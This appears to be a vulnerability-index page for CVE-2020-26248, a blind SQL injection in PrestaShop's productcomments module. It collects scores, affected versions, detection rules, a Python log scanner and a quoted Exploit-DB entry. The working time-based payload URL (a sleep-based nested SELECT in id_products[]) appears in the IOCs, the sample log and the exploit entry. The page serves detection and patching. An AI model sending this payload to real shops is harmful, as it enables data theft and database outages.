CVE-2020-26248
Published 2020-12-03
Priority P2 · 63 · high · CVSS 3.1 base score 8.2
EXPLOIT available · EPSS 12.39% (95.7th percentile)
In the PrestaShop module "productcomments" before version 4.2.1, an attacker can use a Blind SQL injection to retrieve data or stop the MySQL service. The problem is fixed in 4.2.1 of the module.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| prestashop | productcomments | < 4.2.1 | 4.2.1 |
| prestashop | productcomments | — | — |
| prestashop | productcomments | >= 4.0.0 < 4.2.1 | 4.2.1 |
Detection & IOCs (extracted from sources)
URL: http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL]
URL: http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a)
Detection rule (Nuclei-style DSL matcher; filed as "sigma" by the index):
detection:
  selection:
    - 'status_code == 200'
    - 'contains(content_type, "application/json")'
    - 'contains(body, "average_grade")'
  condition: and
# digest: 4a0a00473045022100c8980629d0402e4ee52f520fd18f54d9d8ab769396ab3a6d571570e2366fd06602206969879476e8e31dcf224c4ecccbda6b11a1073874b122d0c6d44f9d9c5e160c:922c64590222798bb761d5b6d8e72950
- Monitor HTTP requests targeting the PrestaShop ProductComments module endpoint: index.php with query parameters fc=module, module=productcomments, controller=CommentGrade, and a potentially malicious id_products[] value containing SQL payloads (e.g., sleep(), nested SELECT statements).
- Alert on HTTP responses with status 200, Content-Type application/json, and a body containing 'average_grade': this is the successful-exploitation response fingerprint for the blind SQLi probe against the CommentGrade controller.
- The vulnerable parameter is 'id_products[]' (URL-encoded as id_products%5B%5D). Inspect this array parameter for time-based blind SQL injection patterns such as sleep() or nested SELECT subqueries.
- The vulnerability is fixed in productcomments module version 4.2.1. Ensure the installed module version is 4.2.1 or later; versions <= 4.2.0 are vulnerable.
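The request-side checks in the notes above, as an added example that is not part of the indexed sources: it parses combined-format access log lines (constructed inline, not real traffic), isolates requests to the productcomments CommentGrade controller, and flags id_products[] values that are not plain integers and carry a sleep() or nested SELECT pattern.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines: a benign CommentGrade request, the
# time-based probe described in the advisory, and an unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Dec/2020:10:01:02 +0000] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=12 HTTP/1.1" 200 88
10.0.0.9 - - [16/Dec/2020:10:01:07 +0000] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a) HTTP/1.1" 200 88
10.0.0.9 - - [16/Dec/2020:10:01:09 +0000] "GET /index.php?id_product=12&controller=product HTTP/1.1" 200 5120
"""

# Combined log format: source, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Patterns named in the detection notes: sleep() and nested SELECTs,
# plus two common time-based/union variants for the same parameter.
SQLI_RE = re.compile(
    r'sleep\s*\(|\bselect\b.*\bselect\b|\bunion\b|\bbenchmark\s*\(',
    re.IGNORECASE,
)


def is_commentgrade_request(query):
    """True when the decoded query targets the productcomments CommentGrade controller."""
    return (query.get("fc") == ["module"]
            and query.get("module") == ["productcomments"]
            and query.get("controller") == ["CommentGrade"])


def suspicious_ids(query):
    """Return id_products[] values that are not integers and match an SQLi pattern."""
    return [v for v in query.get("id_products[]", [])
            if not v.isdigit() and SQLI_RE.search(v)]


def scan_log(text):
    """Return (src, ts, status, payload) for every probe against CommentGrade."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs decodes id_products%5B%5D back to the id_products[] key.
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        if not is_commentgrade_request(query):
            continue
        for payload in suspicious_ids(query):
            hits.append((m["src"], m["ts"], int(m["status"]), payload))
    return hits
```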
CVSS provenance
NVD · v3.1 · 8.2 HIGH · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
NVD · v2.0 · 6.4 MEDIUM · AV:N/AC:L/Au:N/C:P/I:N/A:P
GHSA
Blind SQL injection in PrestaShop productcomments module
ghsa · 2021-01-20
CVE-2020-26248 [LOW] CWE-89 Blind SQL injection in PrestaShop productcomments module
### Impact
An attacker can use a Blind SQL injection to retrieve data or stop the MySQL service.
### Patches
The problem is fixed in 4.2.1
OSV
Blind SQL injection in PrestaShop productcomments module
osv · 2021-01-20
CVE-2020-26248 [LOW] Blind SQL injection in PrestaShop productcomments module
### Impact
An attacker can use a Blind SQL injection to retrieve data or stop the MySQL service.
### Patches
The problem is fixed in 4.2.1
No detection rules found.
Exploit-DB
PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
exploitdb · 2020-12-16 · CVSS 6.8
CVE-2020-26248 [MEDIUM] PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
---
# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
# Date: 2020-12-15
# Exploit Author: Frederic ADAM
# Author contact: [email protected]
# Vendor Homepage: https://www.prestashop.com
# Software Link: https://github.com/PrestaShop/productcomments
# Version: 4.2.0
# Tested on: Debian 10
# CVE : CVE-2020-26248
http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL]
Example:
http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a)
Nuclei
PrestaShop Product Comments <4.2.0 - SQL Injection
nuclei · CVSS 8.2
CVE-2020-26248 [HIGH] PrestaShop Product Comments <4.2.0 - SQL Injection
Template matchers (the opening of the template was lost in extraction; only the tail of the first matcher survives):
    - '[truncated]>=6'
    - 'status_code == 200'
    - 'contains(content_type, "application/json")'
    - 'contains(body, "average_grade")'
  condition: and
# digest: 4a0a00473045022100c8980629d0402e4ee52f520fd18f54d9d8ab769396ab3a6d571570e2366fd06602206969879476e8e31dcf224c4ecccbda6b11a1073874b122d0c6d44f9d9c5e160c:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html
- https://github.com/PrestaShop/productcomments/commit/7c2033dd811744e021da8897c80d6c301cd45ffa
- https://github.com/PrestaShop/productcomments/releases/tag/v4.2.1
- https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9
- https://packagist.org/packages/prestashop/productcomments